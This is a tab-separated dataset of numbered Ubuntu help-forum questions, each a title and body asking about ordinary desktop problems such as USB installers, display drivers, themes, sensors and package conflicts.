21297	how do i install ubuntu-desktop ?	the ubuntu-desktop in synaptic is removed on my system . and when i start the machine , i can not login , the mouse and keyboard can not be used also . how to fix it ? how to enter the text mode of ubuntu ?
21301	how to remove duplicate tracks from banshee ?	how to remove duplicate tracks from banshee ?
21303	create usb installer from the command line ?	i 'm trying to create a bootable usb image to install ubuntu on a new computer . i have done this before following the `` create usb drive '' instructions for ubuntu desktop , but i do n't have an ubuntu desktop available . how can i do the same using only the command line ? things i 've tried : create bootable usb on mac os x following the ubuntu.com `` create usb drive '' instructions for mac : does n't boot . usb-creator : according to apt-cache search usb-creator and wikipedia usb-creator only exists as a graphical tool . `` create manually '' instructions at help.ubuntu.com : none of the files and directories described ( e.g . casper , filesystem.manifest , menu.lst ) exist in the iso image , and i do n't know what has replaced them . unetbootin scripting : requires x server ( graphics support ) to run , even when fully scripted . ( the command sudo unetbootin lang=en method=diskimage isofile=~/ubuntu-10.10-server-amd64.iso installtype=usb targetdrive=/dev/sdg1 autoinstall=yes gives an error message unetbootin : can not connect to x server . ) update also tried grub fiddling : merging information from pendrivelinux.com a related question on the linux stackexchange and a grub configuration example i was able to get halfway there - it booted from usb , displayed the grub menu and started the installation , but the installation did not complete . for reference , this is the closest i got : sudo su # mount usb pen mount /dev/sd [ x ] 1 /media/usb # install grub grub-install -- force -- no-floppy -- root-directory=/media/usb /dev/sd [ x ] # copy iso image to usb cp ~/ubuntu-10.10-server-amd64.iso /media/usb # mount iso image , copy existing grub.cfg mount ~/ubuntu-10.10-server-amd64.iso /media/iso/ -o loop cp /media/iso/boot/grub/grub.cfg /media/usb/boot/grub/ i then edited /media/usb/boot/grub.cfg to add an .iso loopback , example grub entry : menuentry `` install ubuntu server '' { set gfxpayload=keep loopback loop /ubuntu-10.10-server-amd64.iso linux ( loop ) /install/vmlinuz file= ( loop ) /preseed/ubuntu-server.seed iso-scan/filename=/ubuntu-10.10-server-amd64.iso quiet -- initrd ( loop ) /install/initrd.gz } when booting from usb , this would give me the grub boot menu and start the installer , but the installer gave up after a couple of screens complaining that it could n't find the cd-rom drive . ( naturally , as the box i 'm installing on does n't have an optical drive . ) i resolved this particular issue by giving up and doing the `` create usb drive '' routine using the ubuntu live desktop cd ( on a computer that does have an optical drive ) , then the usb install works . but i expect that there is some way to do this from the command line of an ubuntu system without x server and without an optical drive , so the question still stands . does anyone know how ?
21305	desktop forgets theme ?	i am running ubuntu in virtualbox ( on a windows 7 host ) . several times now , the top-level menu bar , the task bar — and seemingly every system dialog — have forgotten the out-of-the-box `` ambiance '' theme they conform to when i first installed the system . window captions still preserve the theme , but pretty much nothing else does . i have searched high and low on google for assistance with this problem . everything i 've found suggests either running some gconf reset or deleting .gconf* .gnome* and other similar directories . i have followed all this advice and nothing works . i still get a boring windows-95-style gray 3d look and feel . on previous occasions , after much messing around i 've given up and rebooted the vm instance , and been pleasantly suprised to see the original `` ambience '' theme restored throughout the ui , but invariably it disappears again some time later , usually after a reboot , so i can never figure out what i did that broke it . here 's a sample from ubuntu 's site of what i want it to look like . and here 's a screenshot of my system as it currently looks . also note that my gnome terminals normally have a nice purple semi-translucent look , and as can be seen from the screenshot , they are now just a solid matte white . this last time ( just yesterday ) , trying numerous combinations all the usual tricks and rebooting several times has n't fixed it , so here i am on su wondering : how do i recover the out-of-the-box theme for my gnome/ubuntu desktop , noting that blowing away all config files — as suggested in many places online — fails to achieve this ? it might help to know that it seems to fail either after i resize the vm instance , forcing the ubuntu desktop to resize itself , or after i play around with compiz settings . i have n't been able to figure out which of these it is , and it could be neither . given the amount of pain i have had to go through to get things back to normal ( and given that i am at a loss as to how to do so ) , it has proven difficult to definitively isolate the cause .
21307	slow internet browsing in ubuntu	i have a dual boot set up with windows and ubuntu . when i 'm using windows , web browsing is a lot faster than when i 'm using ubuntu and i do n't know why . it 's like there 's just a big latency rather than the maximum speed is lower , there 's a big delay before anything happens when using ubuntu , it happens with all websites all the time . i 've never configured the internet connection because it just worked straight away . i have a broadband connection through a router shared with some other computers . when we set up the router and internet connection everything was done with windows . what could i do to fix this ?
21309	how to restore xserver ?	i have recently killed xserver on my machine after a regular update . i have uninstalled and reinstalled nvidia-current with no success . looks i have reinstall xserver . how do i achieve this ? please and thank you .
21312	is there a way to group 2 or 3 gui windows so that they do n't get lost behind other open windows ?	for instance floating panels and main window in gimp are independent windows . if i change focus to a full window ( e.g . firefox by doing alt-shift ) and go back to the main gimp window i do n't get back the floating panels also ( i have to change to them as well in order to see them ) . it would be great if the 3 windows can be `` tied '' ( or linked ) together in order that they do n't get lost behind other open windows when i change back to ( make active window ) any of them ? i think this configuration ( if it exists ) should show itself more obviously in the gnome environment . this question seems to address the same problem but it does n't seem to be accurately answered .
21316	how can i customize a system locale ?	at system → administration → language support → text . i can only choose standard locales , but i would like to fine-tune . for example in windows i could customise things like time and date format , measure units , decimal separator , currency , etc manually - how can i do this in ubuntu ?
21317	what is `` free space notifier '' ?	i 'm running kubuntu 10.04.1 - i click on `` system settings '' from the kmenu , click on the advanced tab , and start up `` service manager '' . in the lower pane , i see `` free space notifier '' is running . update : it might be a monitor for the free disk space in your home partition . can anyone confirm this ?
21321	move home folder to second drive	i have 2 hdd drives in my computer . at the moment second drive is mounted as /media/storage . how can i move my user data from /home to /media/storage/home ? can i just move the data over there and then simply symlink it back ?
21325	1920 x 1080 splash	i have recently purchased a 1920 x 1080 screen and the splash screen is all askew at startup and shut down . is there a way i can fix this to suit my resolution ?
21326	can i toggle word-wrapping on/off quickly in gedit ?	depending on nature of the text , sometimes line wrapping is convenient , sometimes it is just confusing . and every time i need to switch this ( pretty frequently ) i have to do to view - preferences - enable text wrapping - close - four clicks , not mentioning all the hand , eye and thought motion . can this be done a quicker way ? most of text editors have this two clicks away ( in a menu ) at maximum , some have it on a toolbar or a hot key , but i could n't find any quick way in gedit . : - ( maybe there is a hot key i do n't know ?
21329	where are my rhythmbox library folders stored ?	i tried rm ~/.local/share/rhythmbox/ ~/.cache/rhythmbox/ ~/.gconf/apps/rhythmbox/ -r but that only ended up removing the database . i want to remove some folders in particular . how do i do that ? are there symlinks involved ?
21330	how to disable right-click menu in terminal ?	i 'd like to disable right-mouse-click pop-up menu in ubuntu terminal so that mouse right click to be passed to the application ( midnight commander , to select files with the right mouse button ) . how to achieve this ?
21342	how can i load ubuntu when all i have is grub ?	so i have upgraded ubuntu with the latest kernel . but after the upgrade and after i rebooted ubuntu , all i get is grub . how do i load ubuntu again when all i have is grub ? i installed ubuntu using wubi . thanks heaps for the help
21343	how to make sudo remember my password and how to add an application to startup	i guess this should be a simple thing for ubuntu users out there . i have two questions . whenever i need to run some command that requires permission from root , i run as sudo followed by that command . it would be nice if that does not prompt for password ( but i should still be issuing a sudo to make sure that i know what i am doing ) . how to do this ? every time i start my system , i go to terminal and start my vpn using sudo vpnc . this is almost everytime ! how to automate this to a startup script ? help much appreciated ! thanks
21344	is it safe to configure `` shutdown '' on `` when laptop lid is closed '' ?	to setup a laptop owned by a complete pc novice any settings that may become hard to tackle remotely need to be avoided . the laptop will be administrated via ssh . one thing in my list are problems arising from improper wake-ups from suspend or hibernate as they may also affect network accessibility . this is why i thought setting up power management to `` shutdown '' on closing the laptop lid could be a good idea . however i am not sure if this is a safe way to do . what problems in addition to software not closing properly ( and thus not saving their data ) could i be faced if i proceeded as planned ?
21347	is there a schematic overview of ubuntu 's architecture ?	as enthusiastic , advanced linux learner , i 'd love to get an overview about linux ' architecure/structure in general . you know , like `` the big picture '' . i 'm thinking of a large schematic graphic showing what is what , who is who , what system ( e.g . x ) comprises which subsystems ( gdm/gnome/compiz ) on the way from a to z , from boot to interactive desktop , including the most important background services ( auth , network , cron , ... ) . maybe a bit like this : http : //www.flickr.com/photos/pgc/140859386/ but way more detailed . there 's bootchart , which produces very comprehensive charts , but they again are too detailed and difficult to get the `` big picture '' from . is there such a thing ? possibly not for the whole system , but maybe for single subsystems ? i had trouble searching for this , because using search terms like `` scheme '' or `` architecture '' pointed to the wrong direction ( a tool called `` scheme '' or cad software for linux ) . i appreciate any links . if there 's interest in those schematic overviews and links , maybe someone could turn this post into a wiki post ?
21348	is there a weather indicator ?	i recently replaced the indicators in the gnome panel with the indicator applet complete , as can be seen in the screenshot below . however i really miss the weather which used to be displayed with the date gnome applet . i tried searching for an alternative weather indicator and found one here . however its ppa is empty and no longer works . is there any other alternative ? i prefer it being an indicator rather than a ordinary gnome applet as i already know that there is one that can be added to the gnome panel ( screenshot below for more info )
21351	application to display battery info	first of all , i am not sure the title of this question is the most appropriate however this is what i meant to say , there are many ways to extend the life of a laptop battery . one way is by not connecting it to the ac adapter all the time which will overcharge it . i read that in this website . is there an application which automatically prevents the charging of the battery once it has reached 80 % charged ? i mean that is such a cool feature . sometimes people tend to forget to remove the ac adapter and this could diminish the capacity and reduce the life time of the battery . does the battery indicator in ubuntu display info or pop-up when the battery is almost dead ( dead not in the sense of usage time ) but rather a degraded battery ?
21355	in what cases should i install ( and configure ) postfix as a desktop user ?	possible cases : 1 ) i plan to do debian packaging ( this case is the motivation since postfix gets installed as a dependency of some development packages , so it means that in such a case might be necessary ) . 2 ) i plan to use evolution and a internet provider mail account . 3 ) i plan to use gmail . surely if i read postfix documentation i may find the answer , but its huge and could n't find it . in any case how ( or where ) should i find the answer to a question like that by myself ? ( i really tried )
21359	how do i take a screenshot of what is currently in vram ?	i 'm an artist specifically focussing on glitches and errors and i 'm currently trying to find a way to create images like this that were made by taking screenshots of what is currently in vram . is it possible to do this in linux/ubuntu ? if so , how ?
21367	how can i prevent my connection to automatically disconnect when i lock my screen ?	how can i prevent my ( wifi ) connection to automatically disconnect when i lock my screen ? note that this problem does not occur on my home lan for some reason .
21370	automatic syncing usb hd drive to local hd ( different computers )	i have a desktop pc at work , and a laptop at home ... . or elsewhere . what i want to do is use a usb hd to store my documents ( about 130 gb , maybe more ) . that would serve as backup and also port my files to my laptop . i 'd like any of both computers to automatically sync all files there with local copies , so that i can work at either of them and keep updated copies of everything in both ( plus the usb drive , which would allow me to work in other computers , too , apart from being another backup ) . dropbox ins't a solution for me , due to pricing and 100gb limit . the workflow would be as follows , to clear things up : i work on pc1 . changes in files are automatically synced to usb whenever a file is modified . i go home and boot pc2 . i plug the usb drive and local files are synced ( if changed ) with the most recent usb copies . while i work at pc2 , again , changes in files spread to my usb drive . whenever i go to pc1 again , i plug my usb and again everything synces . so the questions would be : a ) am i crazy ? b ) can it be done ? c ) will i have any file conflicts ( provided i 'm the only one that will modify the files ) ?
21373	how can i get firefox to work with the global application menu ?	i 've been following the progress of getting firefox ( and thunderbird ) working with the global application menu , how can i test and follow along it 's progress ?
21375	`` eclipse could not save master table to file ''	i have my eclipse telling about every 10 minutes that `` eclipse could not save master table to file '' . i found an old discusion on this , which tells to delete /home/ < username > /.eclipse folder , but i did a search and there 's no such folder in my whole system . any idea how to solve this ?
21376	problem installing libreoffice	i followed the instructions for installing libreoffice found here , which are basically the same instructions found all over askubuntu and the web in general . i followed the instructions ( including removing oo first ) for gnome ; all that is in my applications menu now is libreoffice ( oo used to have openoffice spreadsheet , openoffice presentation , etc . ) when i open libreoffice , i get the splash screen/menu , but all of the choices for creating new docs are greyed out . it also will not open any office/type files ( no errors ; they just do n't open . ) the terminal commands indicated that installation was successful , but obviously something is missing . i 'm guessing i can just reinstall oo from the software center , but i 'd really like to give libreoffice a try , given the lack of ongoing development on oo . can anyone help me out ?
21378	how can i make sure one upstart job starts before other upstart jobs ?	this is a general upstart question , but let me use a specific case : centrify is a nis to activedirectory gateway . it needs to load before any service that will depend the authentication service that it provides , e.g . autofs , cron , nis , et al . this has proven to be quite challenging to achieve , even when trying to change the dependencies of the other services ( which i do n't think we should be doing anyway , i do n't want to touch the other upstart jobs if at all possible ) . suggestions ?
21379	how do i find the build dependencies of a package ?	i 'd like to find out which packages sudo apt-get build-dep < package > would install ( if i already got some dependencies installed , i 'd also like to see those â so running or simulating the above is not enough ) . command line preferred .
21381	sensors reporting weird temperatures	lm-sensors is reporting weird temps for me : $ sensors coretemp-isa-0000 adapter : isa adapter core 0 : +38.0°c ( high = +72.0°c , crit = +100.0°c ) coretemp-isa-0001 adapter : isa adapter core 1 : +35.0°c ( high = +72.0°c , crit = +100.0°c ) coretemp-isa-0002 adapter : isa adapter core 2 : +32.0°c ( high = +72.0°c , crit = +100.0°c ) coretemp-isa-0003 adapter : isa adapter core 3 : +42.0°c ( high = +72.0°c , crit = +100.0°c ) w83627dhg-isa-0290 adapter : isa adapter vcore : +1.10 v ( min = +0.00 v , max = +1.74 v ) in1 : +1.62 v ( min = +0.06 v , max = +0.17 v ) alarm avcc : +3.34 v ( min = +2.98 v , max = +3.63 v ) vcc : +3.34 v ( min = +2.98 v , max = +3.63 v ) in4 : +1.83 v ( min = +1.30 v , max = +1.15 v ) alarm in5 : +1.26 v ( min = +0.83 v , max = +1.03 v ) alarm in6 : +0.11 v ( min = +1.22 v , max = +0.56 v ) alarm 3vsb : +3.30 v ( min = +2.98 v , max = +3.63 v ) vbat : +3.18 v ( min = +2.70 v , max = +3.30 v ) fan1 : 0 rpm ( min = 0 rpm , div = 128 ) alarm fan2 : 1117 rpm ( min = 860 rpm , div = 8 ) fan3 : 0 rpm ( min = 10546 rpm , div = 128 ) alarm fan4 : 0 rpm ( min = 10546 rpm , div = 128 ) alarm fan5 : 0 rpm ( min = 10546 rpm , div = 128 ) alarm temp1 : +88.0°c ( high = +20.0°c , hyst = +4.0°c ) alarm sensor = diode temp2 : +25.0°c ( high = +80.0°c , hyst = +75.0°c ) sensor = diode temp3 : +121.5°c ( high = +80.0°c , hyst = +75.0°c ) alarm sensor = thermistor cpu0_vid : +2.050 v please note temp3 . how can i know what temp3 is , and why it is so high ? the system is really stable ( which i guess it would n't be at those temps ) . also , note the really decent core temps , which suggest a healthy system as well . my guess is that the readout is wrong . on another computer it reported temperatures below 0 degrees centigrade , which was not possible , considering the environment temperature of ~22-24 . is this some known bug/issue ? should i try some windows programs ( like cpu-z ) and see they give similar results ?
21382	unable to access usb device	i 'm reading my boot logs , at /var/log trying to understand why the boot process is taking so long . i found that the system ca n't access many usb devices , but ca n't understand why . is there a way to stop ubuntu from trying to access them ? here are the lines : /var/log # grep -r `` usb_id '' . ./boot.log : usb_id [ 716 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input7/mouse1' ./boot.log : usb_id [ 721 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input7/event7' ./boot.log : usb_id [ 725 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input7/event7' ./syslog : jan 12 21:12:05 tomsterinc usb_id [ 955 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input16/event16' ./syslog : jan 12 21:12:05 tomsterinc usb_id [ 956 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input16/mouse3' ./syslog : jan 12 21:12:05 tomsterinc usb_id [ 963 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input16/event16' ./daemon.log : jan 12 21:12:05 tomsterinc usb_id [ 955 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input16/event16' ./daemon.log : jan 12 21:12:05 tomsterinc usb_id [ 956 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input16/mouse3' ./daemon.log : jan 12 21:12:05 tomsterinc usb_id [ 963 ] : unable to access '/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1.2/3-1.2:1.0/input/input16/event16 ' update not sure if it helps , but here 's the list of my pci devices pci devices -- -- -- -- -- - -pci devices- host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) ( prog-if 20 ) audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) ( prog-if 20 ) pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) ( prog-if 01 ) isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) sata controller : intel corporation ich9m/m-e sata ahci controller ( rev 03 ) ( prog-if 01 ) smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) vga compatible controller : ati technologies inc mobility radeon hd 3400 series audio device : ati technologies inc rv620 audio device [ radeon hd 34xx series ] network controller : broadcom corporation bcm4312 802.11b/g ( rev 01 ) ethernet controller : broadcom corporation netlink bcm5784m gigabit ethernet pcie ( rev 10 ) firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) ( prog-if 10 ) sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) ( prog-if 01 ) system peripheral : ricoh co ltd r5c843 mmc host controller ( rev 12 ) system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) system peripheral : ricoh co ltd xd-picture card controller ( rev ff ) ( prog-if ff ) any help will be greatly appreciated . thanks in advance .
21383	install ubuntu or kubuntu on a external usb drive	i have a few external hard drives ( ssds and platters ( sata ) , is this possible that i can install kubuntu 10.10 x64 or ubuntu 10.10 x64 onto one of these external hard drives ? my system supports booting off a usb , it will just give me a learning playground without spoiling my existing operating environment . i know i can install as virtual machines , but installing u/kubuntu on a external hdd and booting off it would be easier . will be grateful for your insights ... .and steps to do so . thanks
21396	how to really use multitouch gestures now	so i have a touchscreen now , ubuntu 10.10 , made the gesturetest which works with up to two fingers - but now i have one simple question : how do i enable multitouch so that gnome understands the gestures - at least two finger scrolling should be possible now - right ?
21398	problem with indicator-applet-session	i 'm brazilian . i have a problem with my indicator-applet-session . one day the user-name simply disappeared . so i do n't know what i do to back a normal state .
21400	good ppa for ffmpeg	its annoying that the default ffmpeg in ubuntu 's repositories is outdated and hobbled for legal reasons , however , there 's a great page on the forums that walks you through building it from scratch : http : //ubuntuforums.org/showthread.php ? t=786095 ( i also add in support for -- enable-libdc1394 -- enable-libgsm -- enable-libopenjpeg -- enable-libschroedinger -- enable-libspeex when i build , which is nice , but not essential . ) anyway , i 'm getting set to setup a computer lab running ubuntu for a multimedia class i 'm teaching , and i was wondering if there was ppa out there that did something similar to what is available when building from scratch . the things i absolutely need from it are up-to-date libxvid , libx264 , libfaac , and libmp3lame support plus the un-encumbered stuff ( vorbis , theora , vpx ) . is there a ppa out there that provides something like this ?
21402	persistence problem when installing usb ubuntu variant using windows	i 'm part of a project called one2one2go - we 're developing a live usb ubuntu variant for use in schools in somerville , ma . we have the project files compiled into an iso , and when installed using the native ubuntu startup disk creator , the usb works fine . when installed using a tool on a windows machine ( lili at linuxliveusb.com or liveusb-creator at fedorahosted.org/liveusb-creator ) , the usb works , but does not have persistence . this happens even if the creator is specifically set to allocate an area for persistent files . when comparing files on sticks created in windows or ubuntu , the one file that is different is syslinux/syslinux.cfg . i have printed the contents of the file below : installed on windows : default nomodset label debug menu label ^debug kernel /casper/vmlinuz append boot=casper xforcevesa initrd=/casper/initrd.gz -- label nomodset menu label ^nomodset kernel /casper/vmlinuz append boot=casper quiet splash nomodset initrd=/casper/initrd.gz -- label memtest menu label ^memory test kernel /install/memtest append - label hd menu label ^boot from first hard disk localboot 0x80 append - prompt 0 timeout 1 installed on ubuntu : default nomodset label debug menu label ^debug kernel /casper/vmlinuz append noprompt cdrom-detect/try-usb=true persistent boot=casper xforcevesa initrd=/casper/initrd.gz -- label nomodset menu label ^nomodset kernel /casper/vmlinuz append noprompt cdrom-detect/try-usb=true persistent boot=casper quiet splash nomodset initrd=/casper/initrd.gz -- label memtest menu label ^memory test kernel /install/memtest append - label hd menu label ^boot from first hard disk localboot 0x80 append - prompt 0 timeout 1 for troubleshooting reasons , i changed the windows-created syslinux.cfg to match the one created by ubuntu and persistence worked on it . i think the problem is that on the stick created by windows , there is no `` persistent '' flag , but i do n't know why . is this a problem with our disk image or with the creator ? how would i go about fixing this problem ? thanks in advance for your help . derek redfern
21403	how to enable a symlink in this case	i can not categorize this question under ubuntu since it has nothing to do with it . but i know people here can definitely answer this . i login to one of my deployment boxes using ssh ( no ubuntu here ) . i am working in a tool called teamcity which uses a folder called `` .buildserver '' under home directory of the user . this folder may grow in size as the application runs but the current user is only given a limited amount of space . but the good thing this i got a folder access outside /home/deploy ( deploy being the user here ) folder . i now want to link this .buildserver inside the /home/deploy directory to the other folder where i got permission for ( meaning all the files should be re-routed to that directory ) hope my question was clear , please help .
21406	how do i get a tecknet new webcam camera to work ?	i recently bought this webcam . i stupidly assumed ubuntu would automatically recognize it as it has done with everything else so far , can anyone help me to get it to work ? at the moment , when i plug it in , nothing happens and does n't appear to be recognized . thanks in advance , ell .
21412	natty alpha testing `` kept back '' updates , ubuntu or my system ?	i 'm testing natty and theres a hefty list of updates that are `` kept back '' now to the question are these packages that are most likely held back due to ubuntu ( and will be made available once dependencies and whatnot are added/updated . ) or is there a chance that i screwed my system in a way that some updates are n't compatible
21417	temporarily stopping zeitgeist	is there a way to temporarily stop zeitgeist / the zeitgeist daemon ? i 've tried killing the daemon but it just restarts . i 've tried stopping it , but it still seems to add entries to the activity journal ...
21418	alternative software to freedom and/or anti-social ?	freedom : http : //macfreedom.com/ anti-social : http : //anti-social.cc/ simply put : where can i find an alternative software to either-or/both these apps ? note : part of the appeal of these apps is allowing the user to explicitly make it extra difficult to re-enable these services . unplugging the network cable might seem to achieve the same results from an glance , but the added difficulty in re-enabling those services is what makes these apps valuable .
21427	does unity require proprietary graphics card drivers ?	i understood that the unity desktop in natty uses compiz and therefore requires a graphics card driver that support composition effects . does this mean if i have an ati or nvidia card i 'm forced to install a proprietory driver because the open source drivers for those cards do not support compiz ?
21429	use 3 monitors w/built-in intel adapter + two old nvidia pci cards on 10.10 ?	i 'd like to move from windows with my current workstation . the only thing holding me back is that i have 3 monitors connected to the system and i really take advantage of the real estate when working . i just installed ubuntu 10.10 on the system and one of the monitors is up and running just fine . this monitor is connected to the built-in intel adapter . i also have two old nvidia geforce4 mx 4000 ( nv19pl ) cards in my two pci slots with two monitors connected to them respectively . i installed the legacy ( and proprietary ) nvidia drivers ( the nvidia-96 package ) that claims to support these old cards . now the question is how to get x configured to use all adapters ( using two different drivers ) so i can use all three monitors ( and is this even possible ) ? from what i 've read , it looks like i 'll have to write an xorg.conf file since the nvidia driver does n't support the auto-magic configuration supported by other drivers . on this site : http : //wiki.ubuntu.com/x/config it says that on 10.10 i just need to write an xorg.conf `` containing only those sections and options that you need to override xorg 's autoconfigurated settings '' . so , does this mean i can get away with only including the nvidia-specific configuration stuff and all else will get auto-configured ? or , will providing a config with a `` device '' section overrule the auto-magic from detecting/using the intel adapter ? i ran the included nvidia-xconfig to generate a basic , nvidia-specific xorg.conf but i 'm hesitant to reboot with it in place , suspecting i 'll have a screwed up display . also , is there any way ( any tool or command ) to generate an xorg.conf from the current , auto-configured running state of an x session ? if i have to write a full , complete config , i 'd rather start with one that includes everything that 's been auto-detected thus far ( and merge it with my nvidia version ) . anyhow , any info and thoughts are greatly appreciated ( as are answers ) .
21439	installing windows 7 on a ubuntu 10.10 system	i initially formatted my windows vista machine because it was given me problems and installed ubuntu 10.10 as the primary os and no secondary installed all i have now is ubuntu 10.10 running smoothly but now i want to install windows 7 as a secondary os so that i can dual boot , any help ?
21444	uploading to my local server is slower than downloading from the internet	i have a home ubuntu server that i use for storage . i have mounted a sftp share on my laptop to access my server but the upload speed i get is very slow ( ~400kb/s ) compared to speeds i usually get when downloading through bittorrent ( ~800kb/s ) . it 's kind of weird ... i should get higher speeds on a lan than on the internet ... how can i speed up uploads to my server and how can i troubleshoot where the bottleneck is ?
21447	nvidia problem after inappropriate shut down	after by battery died on my laptop i started my computer after plugging it to the ac adapter , for no reason that i know i cant use the visual effects any more as if my graphic card is not installed ( my graphic card is geforce 300m and nvidia x-settings is working ) i tried generating a new xorg.conf file but nothing happened i marked all the installed nvidia driver in synaptic for re installation and did n't really help i googled the problem appears to be popular but could n't find a solid solution any ideas ?
21449	hangs up on install `` who are you '' -- dell inspiron 1150	i 'm installing to a dell inspiron 1150 from a cd . i get to the window labeled `` who are you ? , '' and enter info into all the fields . the prompt at the bottom says `` ready when you are ... '' the back button is available , but the forward button is grayed out . i tried going back , and i tried reentering the info , and i tried restarting the install , but i ca n't get it past this screen .
21451	checksum errors from hard disk	after running gsmartcontrol , i received three checksum errors on my storage hard disk . error in attribute data structure : checksum error error in attribute thresholds structure : checksum error error in ata error log structure : checksum error does this indicate a hard disk failure ? because , this is the third time i have replaced the same hard disk . ( after seeing this error ) the hard disk is a western digital caviar green . ( 2 tb )
21455	how to manage two video cards on a laptop ( ati and intel ) ?	i have a laptop with two video cards . one ati and on integrated intel . on windows , i can choose which video card i want to use . for example , i use the intel card for normal use and for gaming , i switch to my ati card for better performance , but a shorter battery life . in ubuntu 10.10 , only the intel driver is installed , the ati driver for my card does n't work at all and there 's heat coming out of my computer all the time , like when i 'm playing video games on windows . i think both cards are active , but only the intel one is usefull . how can i solve this by making sure ubuntu is aware of the two video cards and by disabling my ati . or may be i am all wrong about this ?
21457	how do i clean build and installs , ie un-build ?	i have installed and downloaded and built mongodb , and just one works . $ mongo mongo : error while loading shared libraries : libmozjs.so : can not open shared object file : no such file or directory $ /opt/mongo/bin/mongo /opt/mongo/bin/mongo : error while loading shared libraries : libboost_system-mt.so.1.38.0 : can not open shared object file : no such file or directory $ /usr/bin/mongo mongodb shell version : 1.6.5 connecting to : test > i can remove the installation via apt-get . but how do i remove all things mongo that were built with make , and get a clean system ? i followed this guide to build and install mongodb . thanks .
21460	how can i install firefox 4 nightlies and firefox 3.6 stable on the same system	i started using the firefox nightlies a while ago . i would get updates for both versions 4 ( minefield ) and 3.7 ( namoroka ) . now i want to keep version 4 nightly , but replace the 3.7 nightly with 3.6 stable . i 've already removed the 3.7 nightly , but ca n't figure how to install 3.6 stable ( systemwide ) . trying to install it using apt-get starts downloading the nightly again . where do i need to make the necessary changes ? edit for further clarification : installing version 3.6 stable is not a problem . adding the mozilla ppa is not a problem either . getting version 4 nightlies is , likewise , not a problem . installing and running both verstions simultaneously does not cause a profile overlap -- they each have their individual profiles . i have no problems with profiles whatsoever . what is the problem then ? this - > after you add the mozilla ppa , you also start getting the 3.7 nightlies . so ? the process overwrites the stable version of 3.6 with a nightly of 3.7 -- this is what i do not want . temporary solution that i have - > before installing updates everyday , i deselect the 3.7 updates , which keeps the 3.6 intact . i just do n't want to have to do this . i want to stop getting updates for 3.7 nightly . it is n't a big thing at all . i 'll probably just have to uncheck some box somewhere , or make a little change to some config file . but thanks to everyone trying to help . it is much appreciated .
21463	how do i configure the php zend framework in netbeans ?	anyone installed zend-framework plugin ? i installed it , but can not create any php-zend-framework projects . here is a screenshot : in this project i am not able to check the checkbox ( neither zend nor symfony ) . any ideas ?
21469	error while installing spellchecker for libreoffice	when i run this command : sudo apt-get install aspell aspell-en dictionaries-common hunspell-en-us myspell-en-us i get the following error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : hunspell-en-us : conflicts : myspell-en-us but 1:3.2.1-2ubuntu1 is to be installed i used this guide to install libreoffice .
21472	how can i automatically switch to usb headset when plugged in ?	whenever i plugged in my old audio jack headset , sound was immediately diverted from my speakers to the headset speakers , and the microphone was immediately available . when i plug in my new usb headset , i have to open sound preferences and switch both input and output to the headset . is there any way to make this happen automatically ? i 'm using a fujitsu-siemens amilo pi laptop , maverick and a logitech h330 usb headset .
21474	how can i get gcc to write a file larger than 2.0 gb ?	i wanted to recompile 'xxd ' ( written in c ) , so i installed codeblocks as the ide . all seemed to go well unil i discovered that i could n't write past the 2.0 gb barrier ... i 've read that 'gcc ' needs to be recompiled ... ( that sounds a bit dramatic.. ) i 've read that i can use 'fread64 ( ) ' instead of 'fread ( ) ' ... ( did n't work ) i 've read something about a compiler options ( ? ) ... but i get lost at that point ? i am surprised that it did n't work out-of-the-box , as i thought the 2.0 gb limit was ancient history as far as defaults go ... wrong again ? : ( my os is 32-bit , on 32-bit hardware . the gcc version report in as : gcc ( ubuntu 4.4.3-4ubuntu5 ) 4.4.3 is there a simple way around this issue ? ps.. i was fascinated by the warnings : section of 'info xxd ' ( ..only on linux ; )
